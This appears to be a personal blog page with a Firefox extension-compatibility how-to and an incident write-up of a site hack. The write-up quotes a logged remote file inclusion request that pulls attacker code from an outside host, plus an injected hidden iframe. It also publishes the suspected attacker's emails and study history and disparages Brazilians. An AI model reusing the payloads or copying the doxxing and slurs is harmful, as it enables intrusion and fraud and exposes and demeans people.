soledad penadés

repeat 4[fd 100 rt 90]

If you have errors like these ones…

locate the function get_enclosures(), then add this before anything else:

This is for version 1.1!

I would post this in their support forums if only I hadn't to sign into yahoo groups and register to their support forums which obviously are for members only.

I also read that Ryan, one of SimplePie's developers, is working two full time jobs - it didn't sound very nice to me, so I hope this helps him alleviate from answering some questions. And by the way, Ryan, feel free to incorporate that code into simplepie if you think it's good enough :-)

I installed Bon Echo some weeks ago, and first thing I noticed was that some extensions weren't working anymore. Like, for example, webdeveloper toolbar, view source chart, etc… I could find a version of webdeveloper toolbar which worked in Bon Echo but I wanted to know how to do it. And here is it:

Basically each extension developer decides under which versions the extension will be able to work, and they define a range. For example: 0.7 - 1.5.* means an extension will work if you use a firefox version between 0.7 and 1.5 (quite obvious, no?). This means that any extension with this value won't work in Bon Echo, as Bon Echo's version is 2.

To fix this, just save the extension you want to install in any place of your computer. You'll get an xpi file which is actually a zip file. Let's assume it is called extension.xpi. Rename it to extension.zip and uncompress it…  You'll get several files; the important one is install.rdf.

Open install.rdf with any text editor. You'll find an xml file with several configuration values, etc. Look for a pair of values called em:minVersion and em:maxVersion. Most of the extensions which do not work nowadays will have a em:maxVersion value like 1.5.*. Just change 1.5.* with 2, or 3, or whatever which is more than 1.5. Save the modified file.

Now we need to generate again an .xpi file for being able to install it in Firefox. So just compress back all the previous uncompressed files and rename the generated file.zip to file.xpi.

A way of installing this extension is just dragging file.xpi to firefox. The usual pop up warning you before installing an extension will appear; just follow the process as usual.

Some extensions which can be "fixed" like this and seem to work properly: Web Developer Toolbar and View Source chart. (I presume this trick may work in any platform)
Have fun!

We just found some html attached to the end of every html and php file for almost all of our sites. How come, we asked?

I took a look at the server logs for every domain. I was looking for a POST request, since I figured out that it must had been some script kiddie trying to break into our pages with this dumb method. In little time I found that, something as suspicious as the following:

201.13.14.216 - - [27/May/2006:22:40:52 +0000] "GET /index.php?go=http%3A%2F%2Fwww.tnwhunters.com%2Fcmd01.txt%3F&&s=r&cmd=dir&dir=. HTTP/1.1" 200 3819 "-" "Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.7.7) Gecko/20050421 Firefox/1.0.3 (Debian package 1.0.3-2)"

If you open the included url (http://www.tnwhunters.com/cmd01.txt) you see that the server is returning a plain text file which was interpreted as php by the script in neonv2, hence adding all the code that he put on that file available to him. (Obviously we have fixed it immediately and you can't do it anymore). Also, the page for server itself is related to animal huntings, which is completely offtopic. Weird…
That code (take a look, it won't open any pop up… it's simple plain text) is a complete control panel for wannabe hackers. They just need to look for a site with a simple method of loading sections (i.e., including one file depending on the current section) and just explode it, by getting their control panel loaded. Which curiously is half written in Brazilian. The IP of the idiot also corresponds to Brazil, Sao Paulo, as verified by dnsstuff.
The question is why did this idiot add this piece of html to every page and script? Not for becaming famous since the script doesn't produce any visible output. No. It's because he wanted to earn money. So he added a code like this:

iframe width=0 height=0 frameborder=0 xsrc=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 …

This code apparently belongs to an affiliates programme (sited in China) in which he would get paid for each impression the servers at free20 received with his affiliate program. As he included it in an iframe, the page was loaded on the users' computers but never seen, since the iframe dimensions are 0×0 pixels. But he is so stupid that he uses the same affiliate code as the nick he uses for:

• submitting security announcements (which curiously corresponds to the same description of the vulnerabilities he explodes for earning money)
• signing up in gmail (soauker@gmail.com)
• writing in forums defending the hackers against the system, also providing another e-mail address: jpfg@zipmail.com.br. This address could correspond to his real name initials.

It is easy to confirm that both soauker's are the same even if they don't have the same e-mail addresses because he still uses "Adivinha seuburro" as faked name, both in the security announcement and in this forum post as well. Curiously, the forum is related to FreeBSD and in his attacks he used a *nix system, Debian. All matches.

There are also some posts in the forum of a Computer Science institute with the same nick, Soauker. Although the page does not exist anymore, Google's cache can show you his favourite topics, which still are referred to linux. So maybe someone at the Instituto de Informática - PUCMINAS knows a guy which studied there on 2004 and was deeply interested in hacking and *nix systems.

So brazilians hadn't enough with spamming our nice orkut's scrapbooks with crap messages, now they also try to earn money the quick way. Ridiculous…

It is a pity that I can't find any website or abuse e-mail address for his internet provider so I could send them the logs he produced, but anyway I hope this is useful for someone.

Final advice: always always always filter input arguments for your script.

And for Soauker: GET A FUCKING LIFE!